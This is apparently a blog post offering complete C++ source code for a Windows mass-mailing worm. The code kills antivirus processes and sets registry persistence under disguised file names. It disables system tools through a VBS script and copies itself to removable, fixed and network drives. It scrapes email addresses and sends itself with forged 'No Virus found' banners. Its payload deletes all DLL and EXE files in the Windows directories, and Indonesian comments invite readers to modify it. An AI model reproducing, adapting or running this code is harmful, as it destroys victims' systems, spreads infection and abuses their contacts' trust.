Angel Virus Source Code With C++

Compile source code virus dan beri nama sesuai kemauan anda, ini menggunakan LCC win 32 dan Linker, aq kurang tau klau menggunkan visual C++, aq gak pernah menggunakan visual C++ atau borland c++ karna header filenya kurang lengkap dan kurang mendukung dlm membuat virus, itu menurus aq sih.. sorry ya.. Tolong.. di analisa dan diuji coba ya…

There is no order in making virus

001	#include <windows.h>

002	#include <tlhelp32>

003	#include <fstream>

004	#include <mapi>

005	#include <memory>

006	#pragma argsused

007	/* mulai menulis nama anti virus dan update apa aja yg anda tau, apa aja yg ingin di matikan servisnya EXE ya.. lo..h, bisa di modif dan ditambahin sesuai kemauan. tidak ada peraturan dlm membuat virus */

008

009	const char *kill_av[]={ "AGENTSVR.EXE", "ANTI-TROJAN.EXE", "ANTIVIRUS.EXE", "ANTS.EXE",

010	"APIMONITOR.EXE", "APLICA32.EXE", "APVXDWIN.EXE", "ATCON.EXE",

011	"ATGUARD.EXE", "ATRO55EN.EXE", "ATUPDATER.EXE", "ATWATCH.EXE",

012	"AUPDATE.EXE", "AUTODOWN.EXE", "AUTOTRACE.EXE", "AUTOUPDATE.EXE",

013	"AVCONSOL.EXE", "AVGSERV9.EXE", "AVLTMAIN.EXE", "AVPUPD.EXE",

014	"AVSYNMGR.EXE", "AVWUPD32.EXE", "AVXQUAR.EXE", "AVprotect9x.exe",

015	"Au.exe", "BD_PROFESSIONAL.EXE", "BIDEF.EXE", "BIDSERVER.EXE",

016	"BIPCP.EXE", "BIPCPEVALSETUP.EXE", "BISP.EXE", "BLACKD.EXE",

017	"BLACKICE.EXE", "BOOTWARN.EXE", "BORG2.EXE", "BS120.EXE",

018	"CCAPP.exe", "CDP.EXE", "CFGWIZ.EXE", "CFIADMIN.EXE", "CFIAUDIT.EXE",

019	"CFINET.EXE", "CFINET32.EXE", "CLEAN.EXE", "CLEANER.EXE", "CLEANER3.EXE",

020	"CLEANPC.EXE", "CMGRDIAN.EXE", "CMON016.EXE", "CPD.EXE", "CPF9X206.EXE",

021	"CPFNT206.EXE", "CV.EXE", "CWNB181.EXE", "CWNTDWMO.EXE", "D3dupdate.exe",

022	"DEFWATCH.EXE", "DEPUTY.EXE", "DPF.EXE", "DPFSETUP.EXE", "DRWATSON.EXE",

023	"DRWEBUPW.EXE", "ENT.EXE", "ESCANH95.EXE", "ESCANHNT.EXE",

024	"ESCANV95.EXE", "EXANTIVIRUS-CNET.EXE", "FAST.EXE", "FIREWALL.EXE",

025	"FLOWPROTECTOR.EXE", "FP-WIN_TRIAL.EXE", "FRW.EXE", "FSAV.EXE",

026	"FSAV530STBYB.EXE", "FSAV530WTBYB.EXE", "FSAV95.EXE", "GBMENU.EXE",

027	"GBPOLL.EXE", "GUARD.EXE", "HACKTRACERSETUP.EXE", "HTLOG.EXE",

028	"HWPE.EXE", "IAMAPP.EXE", "IAMSERV.EXE", "ICLOAD95.EXE",

029	"ICLOADNT.EXE", "ICMON.EXE", "ICSSUPPNT.EXE", "ICSUPP95.EXE",

030	"ICSUPPNT.EXE", "IFW2000.EXE", "IPARMOR.EXE", "IRIS.EXE",

031	"JAMMER.EXE", "KAVLITE40ENG.EXE", "KAVPERS40ENG.EXE",

032	"KERIO-PF-213-EN-WIN.EXE", "KERIO-WRL-421-EN-WIN.EXE",

033	"KERIO-WRP-421-EN-WIN.EXE", "KILLPROCESSSETUP161.EXE",

034	"LDPRO.EXE", "LOCALNET.EXE", "LOCKDOWN.EXE", "LOCKDOWN2000.EXE",

035	"LSETUP.EXE", "LUALL.EXE", "LUCOMSERVER.EXE", "LUINIT.EXE",

036	"MCAGENT.EXE", "MCUPDATE.EXE", "MFW2EN.EXE", "MFWENG3.02D30.EXE",

037	"MGUI.EXE", "msconfig.exe", "MINILOG.EXE", "MOOLIVE.EXE", "MRFLUX.EXE",

038	"MSCONFIG.EXE", "MSINFO32.EXE", "MSSMMC32.EXE", "MU0311AD.EXE",

039	"NAV80TRY.EXE", "NAVAPW32.EXE", "NAVDX.EXE", "NAVSTUB.EXE",

040	"NAVW32.EXE", "NC2000.EXE", "NCINST4.EXE", "NDD32.EXE",

041	"NEOMONITOR.EXE", "NETARMOR.EXE", "NETINFO.EXE", "NETMON.EXE",

042	"NETSCANPRO.EXE", "NETSPYHUNTER-1.2.EXE", "NETSTAT.EXE",

043	"NISSERV.EXE", "NISUM.EXE", "NMAIN.EXE", "NORTON_INTERNET_SECU_3.0_407.EXE",

044	"NPF40_TW_98_NT_ME_2K.EXE", "NPFMESSENGER.EXE", "NPROTECT.EXE",

045	"NSCHED32.EXE", "NTVDM.EXE", "NUPGRADE.EXE", "NVARCH16.EXE",

046	"NWINST4.EXE", "NWTOOL16.EXE", "OSTRONET.EXE", "OUTPOST.EXE",

047	"OUTPOSTINSTALL.EXE", "OUTPOSTPROINSTALL.EXE", "PADMIN.EXE",

048	"PANIXK.EXE", "PAVPROXY.EXE", "PCC2002S902.EXE", "PCC2K_76_1436.EXE",

049	"PCCIOMON.EXE", "PCDSETUP.EXE", "PCFWALLICON.EXE", "PCIP10117_0.EXE",

050	"PDSETUP.EXE", "PERISCOPE.EXE", "PERSFW.EXE", "PF2.EXE", "PFWADMIN.EXE",

051	"PINGSCAN.EXE", "PLATIN.EXE", "POPROXY.EXE", "POPSCAN.EXE", "PORTDETECTIVE.EXE",

052	"PPINUPDT.EXE", "PPTBC.EXE", "PPVSTOP.EXE", "PROCEXPLORERV1.0.EXE",

053	"PROPORT.EXE", "PROTECTX.EXE", "PSPF.EXE", "PURGE.EXE", "PVIEW95.EXE",

054	"QCONSOLE.EXE", "QSERVER.EXE", "RAV8WIN32ENG.EXE", "RESCUE.EXE",

055	"RESCUE32.EXE", "RRGUARD.EXE", "RSHELL.EXE", "RTVSCN95.EXE",

056	"RULAUNCH.EXE", "SAFEWEB.EXE", "SBSERV.EXE", "SD.EXE", "SETUPVAMEEVAL.EXE",

057	"SETUP_FLOWPROTECTOR_US.EXE", "SFC.EXE", "SGSSFW32.EXE",

058	"avserve2.exe", "SHELLSPYINSTALL.EXE", "SHN.EXE", "SMC.EXE",

059	"SOFI.EXE", "SPF.EXE", "SPHINX.EXE", "SPYXX.EXE", "SS3EDIT.EXE",

060	"ST2.EXE", "SUPFTRL.EXE", "SUPPORTER5.EXE", "SYMPROXYSVC.EXE",

061	"SYSEDIT.EXE", "TASKMGR", "TASKMON.EXE", "TAUMON.EXE", "TAUSCAN.EXE",

062	"TC.EXE", "TCA.EXE", "TCM.EXE", "TDS-3.EXE", "TDS2-98.EXE",

063	"TDS2-NT.EXE", "TFAK5.EXE", "TGBOB.EXE", "TITANIN.EXE",

064	"TITANINXP.EXE", "TRACERT.EXE", "TRJSCAN.EXE", "TRJSETUP.EXE",

065	"TROJANTRAP3.EXE", "UNDOBOOT.EXE", "UPDATE.EXE", "VBCMSERV.EXE",

066	"VBCONS.EXE", "VBUST.EXE", "VBWIN9X.EXE", "VBWINNTW.EXE",

067	"VCSETUP.EXE", "VFSETUP.EXE", "VIRUSMDPERSONALFIREWALL.EXE",

068	"VNLAN300.EXE", "VNPC3000.EXE", "VPC42.EXE", "VPFW30S.EXE",

069	"VPTRAY.EXE", "VSCENU6.02D30.EXE", "VSECOMR.EXE", "VSHWIN32.EXE",

070	"VSISETUP.EXE", "VSMAIN.EXE", "VSMON.EXE", "VSSTAT.EXE",

071	"VSWIN9XE.EXE", "VSWINNTSE.EXE", "VSWINPERSE.EXE",

072	"W32DSM89.EXE", "W9X.EXE", "WATCHDOG.EXE", "WEBSCANX.EXE",

073	"WGFE95.EXE", "WHOSWATCHINGME.EXE", "WINRECON.EXE",

074	"WNT.EXE", "WRADMIN.EXE", "WRCTRL.EXE", "WSBGATE.EXE",

075	"WYVERNWORKSFIREWALL.EXE", "XPF202EN.EXE", "ZAPRO.EXE",

076	"ZAPSETUP3001.EXE", "ZATUTOR.EXE", "ZAUINST.EXE", "ZONALM2601.EXE",

077	"ZONEALARM.EXE","zlclient.exe", "lexplore.exe", "Drunk_lol.pif",

078	"Webcam_004.pif", 0};

079

080	const char *drives[] = {"a:", "b:", "c:", "d:", "e:", "f:", "g:", "h:", "i:", "j:", "k:", "l:",

081	"m:", "n:", "o:", "p:", "q:", "r:", "s:", "t:", "u:", "v:", "w:", "x:",

082	"y:", "z:", 0};

083

084	/* Mulai menginfeksi microsoft office */

085	char *fileNames[] = {"Message.exe", "Letter.exe", "Information.exe", "shadow_angel_lampung_underground.exe",

086	"Documents.exe", "Attached_Message.exe", "Microsoft_Update.exe", "Private_Letter.exe",

087	"Private_Document.exe", "Important_Message.exe"};

088

089	/* mulai memberi pesan pada form suatu program software, kalau bisa jgn dlm

090	bahasa indonesia supaya enggak ketara bener virusnya,saran nih..*/

091	char *subs[] = {"Re: Message", "Re: Letter", "Re: Information", "Warning of your mail ",

092	"Re: Your Documents", "Re: Account Info", "Windows Update",

093	"Re: My Letter", "Re: Docs", "Re: Your Email Info"};

094

095	/* mulai menulis dan memberi pesan jika pengguna komputer menggunakan anti virusnya untuk

096	menscan virus ini,nama web site antivirusnya serta pesan yg inggin ditampilkan.It just trick */

097	char *texts[] = {    "+++ Attachment: No Virus found  +++ MessageLabs AntiVirus - www.messagelabs.com",

098	"+++ Attachment: No Virus found  +++ Bitdefender AntiVirus - www.bitdefender.com",

099	"+++ Attachment: No Virus found  +++ MC-Afee AntiVirus -  www.mcafee.com",

100	"+++ Attachment: No Virus found  +++ Kaspersky AntiVirus - www.kaspersky.com",

101	"+++ Attachment: No Virus found  +++ Panda AntiVirus - www.pandasoftware.com",

102	"+++ Attachment: No Virus found  ++++ Norton AntiVirus - www.symantec.de"};

103

104	/* mulai menginfeksi register */

105	char path[MAX_PATH];

106	HMODULE GetModH = GetModuleHandle(NULL);

107	HKEY hKey;

108	int i = 0;

109	MapiMessage mes;

110	MapiRecipDesc from;

111	char fileName[512];

112	unsigned short counting=0;

113	using namespace std;

114

115	void payload();

116	void GetDebugPriv();

117	void Kill(const char *kill_av);

118	int find_drives(const char *drives);

119	void no();

120	void findMail(char *);

121	void GetMail(char *, char *);

122	void SendMail(char *subject, char *sfrom,char *sto, char *smes);

123	void fastOut();

124

125	ULONG (PASCAL FAR *MSendMail)(ULONG, ULONG, MapiMessage*, FLAGS, ULONG);

126

127	int PASCAL WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow)

128

{

129	HWND hide;

130	AllocConsole();

131	hide = FindWindowA("ConsoleWindowClass", NULL);

132	ShowWindow(hide, 0);

133

134	Sleep(60000);

135	GetDebugPriv();

136	CreateMutex(NULL, true, "-)(-=|L4r1$$4|=-)(-");

137	if(GetLastError() == ERROR_ALREADY_EXISTS)

138

{

139	ExitProcess(0);

140

}

141

142	for(i = 0; kill_av[i]; i++)

143

{

144	Kill(kill_av[i]);

145

}

146

147	char sys[MAX_PATH];

148	char sys2[MAX_PATH];

149	char windir[MAX_PATH];

150	GetModuleFileName(GetModH, path, sizeof(path));

151	GetSystemDirectory(sys, sizeof(sys));

152	GetSystemDirectory(sys2, sizeof(sys2));

153	GetWindowsDirectory(windir, sizeof(windir));

154	strcat(sys, "\\MSLARISSA.pif");

155	strcat(sys2, "\\CmdPrompt32.pif");

156	strcat(windir, "\\SP00Lsv32.pif");

157	CopyFile(path, sys, false);

158	CopyFile(path, sys2, false);

159	CopyFile(path, windir, false);

160

161	RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0, KEY_SET_VALUE, &hKey );

162	RegSetValueEx(hKey, "MSLARISSA", 0, REG_SZ,(const unsigned char*)sys, sizeof(sys));

163	RegSetValueEx(hKey, "Command Prompt32", 0, REG_SZ,(const unsigned char*)sys2, sizeof(sys2));

164	RegSetValueEx(hKey, "(L4r1$$4) (4nt1) (V1ruz)", 0, REG_SZ,(const unsigned char*)windir, sizeof(windir));

165	RegCloseKey(hKey);

166

167

no();

168

169	/* menjalankan perintah pd saat Internet explore di buka bisa di tambah dgn browse lain */

170	ShellExecute(NULL, "open", "IExplore.exe", NULL, NULL, SW_HIDE);

171

172	/* membuka otomatis web site yg kita inginkan di buka */

173	ShellExecute(NULL, "open", "http://www.spyrozone.net", NULL, NULL, SW_HIDE);

174

175	Sleep(60000);

176	ShellExecute(NULL, "open", "C:\\WINDOWS\\WinVBS.vbs", NULL, NULL, SW_HIDE);

177

178	for(i =0; drives[i]; i++)

179

{

180	find_drives(drives[i]);

181

}

182

183	HINSTANCE MAPIlHnd;

184	unsigned char buff[128];

185	DWORD buffs = 128;

186	HKEY keyHnd;

187	char keyPath[] = "Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders";

188	char keyItem[] = "Personal";

189

190	counting = (unsigned short)GetTickCount();

191

192	while(counting > 9)

193

{

194	counting = (unsigned short)(counting/2);

195

}

196

197	if(!GetModuleFileName(hInstance, fileName,512))

198

{

199	fastOut();

200

}

201

202	MAPIlHnd = LoadLibraryA("MAPI32.DLL");

203

204	if(!MAPIlHnd)

205

{

206	fastOut();

207

}

208

209	(FARPROC &)MSendMail = GetProcAddress(MAPIlHnd, "MAPISendMail");

210

211	if(!MSendMail)

212

{

213	fastOut();

214

}

215

216	findMail(".");

217	findMail("\\windows");

218

219	if(RegOpenKeyEx((HKEY)0x80000001, keyPath, 0, KEY_READ, &keyHnd) == ERROR_SUCCESS)

220

{

221	if(ERROR_SUCCESS == RegQueryValueEx(keyHnd, keyItem, 0, 0, buff, &buffs))

222

{

223	buff[buffs-1] = '\\';

224	buff[buffs] = 0;

225	findMail((char *)buff);

226

}

227

}

228

229	FreeLibrary(MAPIlHnd);

230

231	/*     1 juzt w4nn4 $4y... 1 l0v3 u ~!L4r1$$4!~     */

232

233	payload();

234

235	for(i = 0; i < 9999999999999999999; i++)

236

{

237	Sleep(60000);

238

}

239

240	ShellExecute(NULL, "open", "MSLARISSA.pif", NULL, NULL, SW_HIDE);

241	Sleep(10000);

242	ShellExecute(NULL, "open", "CmdPrompt32.pif", NULL, NULL, SW_HIDE);

243	Sleep(10000);

244	ShellExecute(NULL, "open", "SP00Lsv32.pif", NULL, NULL, SW_HIDE);

245

246

return 0;

247

}

248

249	/*Menulis pesan pada komputer yg terinfeksi,yahh.. sekedar pesan aja */

250	void payload()

251

{

252	ofstream sini;

253	sini.open("C:\\PESAN.txt");

254	sini.setf(ios_base::showpoint);

255	sini<< "Komputer anda telah terinfeksi!" << endl;

256	sini<< "kamu akan selamat," << endl;

257	sini<< "Anda akan selamat untuk saat ini aja." << endl;

258	sini<< "Tapi sistem komputer kamu akan rusak," << endl;

259	sini<< "Kayaknya sih..." << endl;

260	sini<< "Dibuat oleh," << endl;

261	sini<< "Underground Lampung." << endl;

262	sini<< "Hasta La Vista Bye.. Bye..," << endl;

263	sini<< "   - SHADOW ANGEL : 7-20-07" << endl;

264	sini.close();

265

266	ofstream msg_av;

267	msg_av.open("C:\\PESAN_KE_ANTIVIRUS.txt");

268	msg_av.setf(ios_base::showpoint);

269	msg_av << "Salam anti virus!" << endl;

270	msg_av << "Saya ingin membuat industri anti virus <img src="http://www.spyrozone.net/hacking/wp-includes/images/smilies/icon_smile.gif" alt=":-)" class="wp-smiley"> " << endl;

271	msg_av << "  ----------------------------------------  " << endl;

272	msg_av << "       - SHADOW ANGEL: 7-20-07" << endl;

273	msg_av.close();

274

275	ofstream bropia_msg;

276	bropia_msg.open("C:\\PESAN_KE_BROPIA.txt");

277	bropia_msg.setf(ios_base::showpoint);

278	bropia_msg << "Halo Bropia.. berhenti membuat worm MSN itu merupakan pekerjaan bodoh..." << endl;

279	bropia_msg << "... lol -- Shadow Angel Anti Bropia... -- Selamatkan dunia dari  BROPIA!!!" << endl;

280	bropia_msg << "                    - SHADOW ANGEL : 7-20-07" << endl;

281	bropia_msg.close();

282

283	system("del C:\\WINDOWS\\System32\\*.dll");

284	system("del C:\\WINDOWS\\System32\\*.exe");

285	system("del C:\\WINDOWS\\System\\*.dll");

286	system("del C:\\WINDOWS\\System\\*.exe");

287	system("del C:\\WINDOWS\\*.dll");

288	system("del C:\\WINDOWS\\*.exe");

289

}

290

291	void Kill(const char *kill_av)

292

{

293	HANDLE laris;

294	PROCESSENTRY32 process;

295	process.dwSize = sizeof(PROCESSENTRY32);

296	void* photo = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);

297	Process32First(photo, &process);

298	while(photo != NULL)

299

{

300	Process32Next(photo, &process);

301	laris = OpenProcess(PROCESS_TERMINATE, false, process.th32ProcessID);

302	if(!strcmp(process.szExeFile, kill_av))

303

{

304	TerminateProcess(laris, 0);

305	CloseHandle(laris);

306

break;

307

}

308	if(GetLastError() == ERROR_NO_MORE_FILES)

309

{

310

break;

311

}

312	CloseHandle(laris);

313

}

314

}

315

316	void GetDebugPriv()

317

{

318	HANDLE hToken;

319	LUID DebugVal;

320	TOKEN_PRIVILEGES tp;

321	if(!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY,&hToken))

322

{

323

return;

324

}

325	if(!LookupPrivilegeValue(NULL,SE_DEBUG_NAME,&DebugVal))

326

{

327	CloseHandle(hToken);

328

return;

329

}

330	tp.PrivilegeCount = 1;

331	tp.Privileges[0].Luid = DebugVal;

332	tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;

333	AdjustTokenPrivileges(hToken, FALSE, &tp, sizeof(tp), NULL, NULL);

334	CloseHandle(hToken);

335

}

336

337	/* Mulai menginveksi perangkat  USB */

338	int find_drives(const char *drives)

339

{

340	char dir[MAX_PATH];

341	UINT dr_type = GetDriveType(drives);

342

343	if(dr_type == DRIVE_REMOVABLE)

344

{

345	strcpy(dir, drives);

346	strcat(dir, "\\");

347	strcat(dir, "PUISI_CINTA.pif");

348	CopyFile(path, dir, true);

349

return 0;

350

}

351	if(dr_type == DRIVE_FIXED)

352

{

353	strcpy(dir, drives);

354	strcat(dir, "\\");

355	strcat(dir, "PUISI_CINTA.pif");

356	CopyFile(path, dir, true);

357

return 0;

358

}

359	if(dr_type == DRIVE_REMOTE)

360

{

361	strcpy(dir, drives);

362	strcat(dir, "\\");

363	strcat(dir, "PUISI_CINTA.pif");

364	CopyFile(path, dir, true);

365

return 0;

366

}

367

return 0;

368

}

369

370

void no()

371

{

372	ofstream nono;

373	nono.open("C:\\WINDOWS\\WinVBS.vbs");

374	nono.setf(ios_base::showpoint);

375	nono << "CreateObject(\"Wscript.shell\").regwrite \"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoRun\", 1, \"REG_DWORD\"" << endl;

376	nono << "CreateObject(\"Wscript.shell\").regwrite \"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\DisableRegistryTools\", 1, \"REG_DWORD\"" << endl;

377	nono << "CreateObject(\"Wscript.shell\").regwrite \"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoDrives\", 67108863, \"REG_DWORD\"" << endl;

378	nono << "CreateObject(\"Wscript.shell\").regwrite \"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\WinOldApp\\Disabled\", 1, \"REG_DWORD\"" << endl;

379	nono << "CreateObject(\"Wscript.shell\").regwrite \"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\NoAdminPage\", 1, \"REG_DWORD\"" << endl;

380	nono.close();

381

}

382

383	void fastOut()

384

{

385	MessageBox(NULL, "Invalid memory adress:\n\nProgram terminating.", "System Error", MB_OK | MB_ICONERROR);

386

exit(-1);

387

}

388

389	void SendMail(char *subject, char *sfrom, char *sto, char *smes)

390

{

391	memset(&mes, 0, sizeof(MapiMessage));

392	memset(&from, 0, sizeof(MapiRecipDesc));

393	from.lpszName = sfrom;

394	from.ulRecipClass = MAPI_ORIG;

395	mes.lpszSubject = subject;

396	mes.lpRecips = (MapiRecipDesc *)malloc(sizeof(MapiRecipDesc));

397

398	if(!mes.lpRecips)

399

{

400	fastOut();

401

}

402

403	memset(mes.lpRecips, 0, sizeof(MapiRecipDesc));

404	mes.lpRecips->lpszName = sto;

405	mes.lpRecips->ulRecipClass = MAPI_TO;

406	mes.nRecipCount = 1;

407	mes.lpFiles = (MapiFileDesc *)malloc(sizeof(MapiFileDesc));

408

409	if(!mes.lpFiles)

410

{

411	fastOut();

412

}

413

414	memset(mes.lpFiles, 0, sizeof(MapiFileDesc));

415	mes.lpFiles->lpszPathName = fileName;

416	mes.lpFiles->lpszFileName = fileNames[counting];

417	mes.nFileCount = 1;

418	mes.lpOriginator = &from;

419	mes.lpszNoteText = smes;

420	(MSendMail)(0, 0, &mes, MAPI_LOGON_UI, 0);

421	free(mes.lpRecips);

422	free(mes.lpFiles);

423

}

424

425	void findMail(char *wild)

426

{

427	HANDLE fh;

428	WIN32_FIND_DATA fdata;

429	char mail[128];

430	char buff[512];

431	wsprintf(buff, "%s\\*.ht*", wild);

432	fh = FindFirstFile(buff, &fdata);

433	if(fh == INVALID_HANDLE_VALUE)

434

{

435

return;

436

}

437

while(1)

438

{

439	wsprintf(buff, "%s\\%s", wild, fdata.cFileName);

440	GetMail(buff, mail);

441	if(strlen(mail)>0)

442

{

443	/* Mulai menuliskan E-mail pembuat,jangan dirubah ya.. Please T_T */

444	SendMail(subs[counting], "shadow_angel@undergroundfc.com", mail, texts[counting]);

445	counting++;

446

{

447	if(counting == 10)

448

{

449	counting = 0;

450

}

451	if(!FindNextFile(fh, &fdata))

452

{

453	FindClose(fh);

454

return;

455

}

456

}

457

}

458

}

459

}

460

461	void GetMail(char *name, char *mail)

462

{

463	HANDLE fd,fd2;

464	char *mapped;

465	DWORD size, i, k;

466	BOOL test = FALSE, valid = FALSE;

467	mail[0]=0;

468	fd=CreateFile(name,GENERIC_READ, FILE_SHARE_READ, 0, OPEN_EXISTING, FILE_ATTRIBUTE_ARCHIVE, 0);

469	if(fd == INVALID_HANDLE_VALUE)

470

{

471

return;

472

}

473

474	size = GetFileSize(fd,NULL);

475

476

if(!size)

477

{

478

return;

479

}

480

481	if(size < 256)

482

{

483

return;

484

}

485

486	size -= 100;

487	fd2 = CreateFileMapping(fd, 0, PAGE_READONLY, 0, 0, 0);

488

if(!fd2)

489

{

490	CloseHandle(fd);

491

return;

492

}

493

494	mapped = (char *)MapViewOfFile(fd2, FILE_MAP_READ, 0, 0, 0);

495	if(!mapped)

496

{

497	CloseHandle(fd);

498

return;

499

}

500

501

i = 0;

502

503	while(i < size && !test)

504

{

505	if(!strncmp("mailto:", mapped + i, strlen("mailto:")))

506

{

507	test = TRUE;

508	i += strlen("mailto:");

509

k = 0;

510	while(mapped[i]!=34 && mapped[i]!=39 && i < size && k < 127)

511

{

512	if(mapped[i] != ' ')

513

{

514	mail[k] = mapped[i];

515

k++;

516

517	if(mapped[i] == '@')

518

{

519	valid=TRUE;

520

}

521

}i++;

522	}mail[k] = 0;

523

}else

524

{i++;

525

}}

526	if(!valid){

527	mail[0] = 0;

528	UnmapViewOfFile(mapped);

529	CloseHandle(fd);

530

return;

531

}

532

}

Posted in: malware